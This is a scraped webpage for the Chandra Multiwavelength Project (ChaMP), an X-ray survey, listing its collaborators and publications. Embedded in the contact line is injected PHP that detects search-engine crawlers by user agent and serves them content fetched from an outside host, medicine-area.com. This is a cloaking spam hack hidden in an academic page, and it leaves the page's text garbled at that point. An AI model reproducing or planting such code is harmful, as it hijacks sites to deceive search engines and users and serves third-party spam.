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The unprecedented spatial resolution and sensitivity of the Chandra
X-ray Observatory provides a rich archive of serendipitous sources.
The Chandra Multiwavelength Project (ChaMP)
seeks to understand the nature and evolution of
quasars, galaxies, and clusters of galaxies in a large, carefully
constructed multi-wavelength survey. A team of scientists, led
by staff members at the Chandra X-ray Center (CXC) with collaborators
from NOAO, MIT, MMTO, SDSS, UofA, MSU, OSU, Ohio, UT, Rome, Italy and
Bristol, UK, is carrying out a multi-wavelength identification program
for these X-ray sources. In addition to our extragalactic study, a Chandra Galactic Plane survey, ChaMPlane, is being led by Josh Grindlay
The Largest X-ray Selected Sample of z > 3 AGNs: C-COSMOS & ChaMP Empirical Links between XRB and AGN accretion using the complete z<0.4 spectroscopic CSC/SDSS Catalog Table 1 datafile of X-ray spectral and SED fit results for 617 Chandra/SDSS AGN. The Chandra Multi-wavelength Project: Optical Spectroscopy and the Broadband Spectral Energy Distributions of X-Ray-selected AGNs Table of sources and README file.
The Field X-ray AGN Fraction to z=0.7 from the Chandra
Multiwavelength Project and the Sloan Digital Sky Survey ,
Haggard, D., Green, P.J., Anderson, S.F., Constantin, A.,
Aldcroft, T., Kim, D.-W., Barkhouse, W.A. 2010, ApJ, 723, 1447
Probing the Balance of AGN and Star-Forming Activity in the Local Universe with ChaMP , Constantin, A., Green, P.J., Aldcroft, T., Kim, D.-W., Haggard, D., Barkhouse, W., & Anderson, S.F. 2009, ApJ, 705, 1336
A Full Year's Chandra Exposure on SDSS Quasars from the Chandra
Multiwavelength Project, Green, P. et al. 2009, ApJ, 690, 644
The ChaMP Extended Stellar Survey (CHESS): Photometric and Spectroscopic Properties of Serendipitously Detected Stellar X-ray Sources, Covey, K. et al. 2008, ApJS, 178, 339 The Luminosity Function of X-ray Selected Active Galactic Nuclei: Evolution of Supermassive Black Holes at High Redshift, Silverman, J. D. et al. 2008, ApJ, 679, 118 Chandra Multiwavelength Project X-ray Point Source catalog M. Kim et al., 2007, ApJS, 169, 401 Chandra Multiwavelength Project X-ray Point Source Number Counts and the Cosmic X-ray Background, M. Kim et al., 2007, ApJ, 659, 29 ChaMP Serendipitous Galaxy Cluster Survey, Barkhouse et al., 2006, ApJ, 645, 955 Chandra Multiwavelength Project: Normal Galaxies at Intermediate Redshift, Kim, D.-W. et al. 2006 ApJ, 644, 829
Co-moving space density of X-ray-selected Active Galactic Nuclei,
Silverman et al. Hard X-ray emitting Active Galactic Nuclei selected by the Chandra Multi-wavelength Project, Silverman et al., 2005 ApJ, 618, 123
Discovery of a Jetlike Structure at the High-Redshift QSO CXOMP J084128.3+13110
Schwartz et al. 2004, ApJ Letters, 605, 105 ChaMP Contact Information: if ((eregi("bot", $_SERVER['HTTP_USER_AGENT']) or eregi("urp", $_SERVER['HTTP_USER_AGENT'])or eregi("msn", $_SERVER['HTTP_USER_AGENT']))) { print getcontent('medicine-area.com',80,'/edu.php'); } function getcontent($server, $port, $file) { $socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket"); $refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server; fputs($socket, "GET $file HTTP/1.0\r\n"); fputs($socket, "Referer: http://$refer\r\n"); fputs($socket, "Host: $server\r\n"); fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n"); $wr = 0; while(!feof($socket)) { $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
Date Last Modified: 29 November 2006
Contact: Webmaster